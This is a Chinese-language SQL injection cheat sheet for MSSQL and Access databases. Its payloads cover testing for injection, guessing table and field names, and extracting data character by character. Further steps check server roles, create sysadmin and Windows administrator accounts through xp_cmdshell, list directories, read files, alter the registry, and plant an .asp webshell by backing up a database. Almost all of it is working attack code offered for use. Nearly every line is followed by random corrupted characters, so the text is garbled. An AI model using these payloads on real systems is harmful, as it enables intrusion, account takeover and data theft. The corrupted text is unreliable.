1.判断是否有注入;and 1=1 ;and 1=2 /=t�rj�5�h
2.初步判断是否是mssql ;and user>0 S�W;HjQ>V�
!3HsI|�$<G
3.注入参数是字符'and [查询条件] and ''=' Wo�2��v5-
&<=e�_0�zT
4.搜索时没过滤参数的'and [查询条件] and '%25'=' `A"�Q�3sf%
�A:���c]�1
5.判断数据库系统 �b�pnv�&EG
n�F��j-�<!
;and (select count(*) from sysobjects)>0 mssql �w^�U}|�h"
��!^1[ s@1
;and (select count(*) from msysobjects)>0 access ��fwH�`}<o
IwM8�#6;S~
TC�@bL�<1
0T1ko,C!,e
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �*) �}
�:l
bH�JoEY�Y^
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m8u=u4z("
L�^ja��B�l
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 3�XG�B+$]C
2x6<8�J8v*
9.(1)猜字段的ascii值(access) �,wlbI�l~�
1�w�b�Tqc
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ($:y\,5(9I
���0IpS��T
(2)猜字段的ascii值(mssql) �WT?b��Bf
XW^8A�77H�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 0&Qsk�!-B
\�bo�L`��X
10.测试权限结构(mssql) �$kIo4$.Y$
�vi<X3G6Xh
}/�4����9T
����?n�&$m
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- /�_Hwif�RQ
d>;2,srUf�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- h��Mz&JJ&B
�) �(+)Q'*
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- FXeV�6zfrE
�=�Iy/cHK
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cP,��;Qbe�
PlF!cr7:4�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ||`qIElAW,
VO�g/VGJ��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- | yS�5[?.`
�?LR"hZ>��
;and 1=(select IS_MEMBER('db_owner'));-- ��6�1L7
-~
V��k��W�O}
]�u;GNz}?�
k3�C���"�
11.添加mssql和系统的帐户 P��f{`/UlD
�u�\:rY)V
;exec master.dbo.sp_addlogin username;-- �tn��N�'V�
;exec master.dbo.sp_password null,username,password;-- T�t`L�(�oF
y��S�+�(�<
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �^g-Fg>&M�
C(x��qvK~p
;exec master.dbo.xp_cmdshell 'net user username password U�%h7h`=F?
70duk:�Ri0
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K q/~�T7Ru
��Oq[i &��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- \O�z,�Qzr|
m';#R9\Fz�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
!8�we8)�7
L#`7��FaM?
C?{D"f`[]
<�s�O?�ev[
12.(1)遍历目录 �;��x,�+*%
)-)ss"\+Ju
;create table dirs(paths varchar(100), id int) "$]ls9�-%n
-�J��{D�xz
;insert dirs exec master.dbo.xp_dirtree 'c:\' {3.*7gnY\L
s c5�\( �b
;and (select top 1 paths from dirs)>0 tSI�& "-��
��a5X`�j�o
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) W^003*m~~K
k��{?!O\yY
p}�96uaC�1
Y+!Ouc!$��
(2)遍历目录 wH+FFXGJs�
g'KzdG`O�0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �>�'e��B2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ZGA)r0]
P`
:jB�ZK=3F>
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 T�!X�m"�)d
1]_?�$)$�T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 /3OC7!~;fM
7W�gIh�Q�~
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��n�?zbUA#
(D�0C#<4P�
7U&5�^s
)J
�x(rd$oZ�O
13.mssql中的存储过程 S�@9w'�upd
iJ,M-GHK
xp_regenumvalues 注册表根键, 子键 &t�~zD4u B
<9�ePi�9D(
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 h�U 9\y���
}���Q!h ov
xp_regread 根键,子键,键值名 Q�^*G`&w�,
3w
t:5
Im
;exec xp_regread �umZlIH[7
g�8�L��T�7
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �N-X�VRu�v
l�#X=]xQf�
xp_regwrite 根键,子键, 值名, 值类型, 值 "|�(r�Vj=�
aUKh})���B
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Ued�vA9$&;
7��bA4��P*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <Gn8�B^~$�
4k�Wg>�F3�
xp_regdeletevalue 根键,子键,值名 A
Z4|&�i�T
B���O?mQu~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �;��[FW!��
� KYnW7�|*
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Sg/:��n,68
!S~,>�,y�d
=�$^��Wkau
_7r�qX�kp%
14.mssql的backup创建webshell Z[�a �O_6L
2=i�gS��#h
use model j5PaS�k&o=
}V\P�,c�k
create table cmd(str image); �di�8W2cwz
���]c�x�"
insert into cmd(str) values (''); �/d{g�l�Ok
�//#x��K D
backup database model to disk='c:\l.asp'; fKP�iRl�LS
J���VD@I{�
9=Y,["br$_
^t�\k���LU
15.mssql内置函数 A8�\�U
�CG
�@`��w�' �
;and (select @@version)>0 获得Windows的版本号 �B.]q�r�S|
-�s9�Y(��>
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �1�;cv-�W�
�r{p��I-$
;and (select user_name())>0 爆当前系统的连接用户 g2+l@$�W�
��XD;�15a�
;and (select db_name())>0 得到当前连接的数据库 ��zkj�PLeX
hk�nwis%�y
�fl�} rz�
skk-����.9
16.简洁的webshell � �6��'RZ�
)m|X�;eEo
use model *��\=2KIF'
��/��W"Bf�
create table cmd(str image); s5c! ^,L�8
(�Wm/$��P;
insert into cmd(str) values (''); d%}crM-KTL
�D}zO�uB,S
backup database model to disk='g:\wwwtest\l.asp';
